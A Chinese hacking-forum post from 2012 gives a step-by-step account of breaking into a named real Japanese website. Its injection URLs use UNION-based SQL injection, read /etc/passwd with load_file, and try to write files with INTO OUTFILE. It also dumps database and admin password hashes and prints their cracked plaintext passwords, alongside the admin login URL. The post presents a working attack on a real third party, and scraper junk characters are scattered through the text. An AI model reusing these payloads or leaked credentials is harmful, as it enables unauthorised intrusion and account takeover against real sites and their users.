找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
返回列表 发新帖
查看: 4254|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试
$ |* ]" @# t1 n4 z" v

# `* K$ B) P- \) I$ L0x01. 检测 www.zuaa.jp 收集数据; {; ?- _1 R" J
2 e# e6 Z. X# I( g9 Y
1 ~, V/ k( Y) T) g  L* s
whatweb( V! l. {5 W9 D+ U% p
' P8 T8 {/ ^( E" H

0 z+ U; l3 V; r6 R3 m( d利用NMAP扫描* d0 \# x8 t( B7 O8 W- l, G
4 v2 L* z' T% }
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持3 m0 n& C4 y- K4 n
0x02.找注入点: }/ E* G( R2 a) u- Y9 y
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390
" h! L' L- }8 C; ]+ l" r' k1 ?& [6 ~# y! X$ }$ Z1 Q

2 X. t9 A/ M* c$ ]. R- m7 Y. N0x03.order by
  C  k+ r9 {4 v$ _9 H# E, J3 d; x             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 15 p  y; n  @7 j, L8 P/ V

- {5 |1 D5 v6 x/ K5 Z. ]order by 28报错,order by 27正常+ V$ ]1 L8 }$ r) \; p! w: T

! j. I' K) B) c2 }! }9 k0x04.   union手动查询5 |) Y* X+ G: e, ?, B% j
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27   S5 Z0 r0 @1 p
添加到 27 时正常显示
) }. c* V5 }- F: S' p+ C) u2 M) x" D7 s' N& t5 u, f, z
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持7 ~+ j7 l2 F; b7 V+ e$ d6 C, L  v8 @

1 b+ o8 k( g6 I' H+ J0x05. info:1 W8 g7 _) b3 E
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
9 _& e9 o! p! x: Z( E3 |/ _8 b/ b; C5 Z& j
user:            root@localhost$ p, ~$ `7 l5 X$ [
database:    openpne  N, x9 k6 g4 Y5 N. `; P! m. R) [
version:      4.1.22/ @: x* f$ W: ^; J% P* C% P: c6 r
os:             portbld-freebsd5.4
8 S3 b" C$ a' {( Y* D5 q2 g+ c$ E# W" Y; J" ~
0x06. root用户3 q% u0 \* ^! I
利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
0 s3 C8 o* k4 a! P; G6 _4 jhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 8 l8 U$ K' a) S; R
7 i$ \2 J9 u4 Z/ C- I! K
通过工具转换
4 [  n3 P, y- v% K! R- I) m, i7 d. d4 D& t; f0 H
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持- _/ F! f7 k3 J0 f! a

; l! F% k& d  `. W+ h0x07. 利用 into outfile; {+ E- z  \* j* ]: Y1 D- @
全部都失败3 x) L% k$ D0 J. H4 [* c* B' |
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php1 R# V+ \  P" w
4 k$ _6 o8 `( ~+ e$ r6 H# I
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php 0 O) R- R% w& N7 L4 D
/ L' A5 h" Z9 T9 }1 n
页面显示“MDB2 Error:syntax error”
' ]$ f2 n6 ^) |
1 e. P% f" V0 j8 h( Y% Z- t4 n0x08. 利用 mysql 4.1) G: [7 Q& R, @
猜常规表名,字段未果 工具 sqlmap
' e* C' D+ q! e1 x5 G0 V中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持2 }4 w* @4 }1 A5 h. i. n
4 ]& j# z$ ~4 q0 {0 @3 w+ M
- h8 O8 A# [6 G1 R4 I
/ |% @: z) j: ]: n6 n  K# A
0x09. 查找后台3 f, \- R7 [$ H* K- z  t( x
利用 现有的各种 后台工具尝试都不行
, d3 A2 }9 o3 f# \9 [
, _- M( a+ h$ T2 i0x10.  MySL外联方法- w; ?  k4 `+ @5 i! J+ e
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行/ A! l! }3 f% W1 p; C' |- n! A7 r1 L( s
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user; ]8 S* Q1 d- J) K# ~
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user$ M3 _$ [4 y* u2 H

' ^/ c5 u4 g3 U) d( c这个可以在 www.cmd5.com 解密2 R  ~# l1 {% P* s  Y) C4 C
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009- w9 x! s/ Q* v3 R) m7 z
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad977 F8 |- w6 U8 O0 E
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???$ k7 d9 v( T5 [, d2 b
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
" e1 [- z7 p  z. C( S  O5 a工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
. L% J2 h5 s& U2 ]# R$ M" ]2 C( K
$ n( y" f0 M8 h# M/ \& m: ?+ m% t' [- D2 r- h; B
0x11. 网站突破& g' g( u' ^$ y/ U
发现网站的源程序 openpne, google 下载 openpne 源码! m# W4 J% g( _- \$ J
# J) |' _! x( O: q$ \% j
3 b9 e0 x- p5 J8 z
0x12. 默认信息利用# ~8 `! Q+ j- k& D, Q$ r5 {
http://sns.zuaa.jp/?m=admin&a=page_login
* i" M/ p0 h. H- N" l
7 [2 F7 k9 f7 P7 C表名 (c_admin_user) ,字段名(username,password)) C& q$ {; f8 _1 i) m2 v$ Z
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user; n  u9 W9 Q9 J

  h4 E! ~/ `: v0 x1 q+ L& v解密) C7 g5 P* G: [% Q/ b
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009
  P& d) J! f. A- gzuaajp:c0923ec5857796a393da99905008c176,          zju1897& R9 U# s8 [# s7 ]- ~7 h8 J, O
+ u/ A0 }. N+ b5 P
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持/ @) V! D1 V0 d9 }9 C1 L$ n

9 y# V' y' t4 |& \0x13. 登录后台+ L9 J9 T" s. a( x3 q. {

& h- h* v6 ]; K+ w. K% ?' A8 `; D

$ E. k8 I* E; |* X! G2 n0 o3 j4 Q' J. ~0x14. 小结
; w; @$ m/ j( S- d4 ~+ @. u) E/ G2 N! z利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
; g( s& F0 y% s. O4 _( S感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点" Y1 W1 o4 b& g; n5 k
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
0 ?- A+ i" c( r. {4 _" L: W中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持6 Z* D3 v$ j: c

- W) I# I) F  ~- g) f& f, F8 |. F最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
( |( I' r$ `1 c' \7 [

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表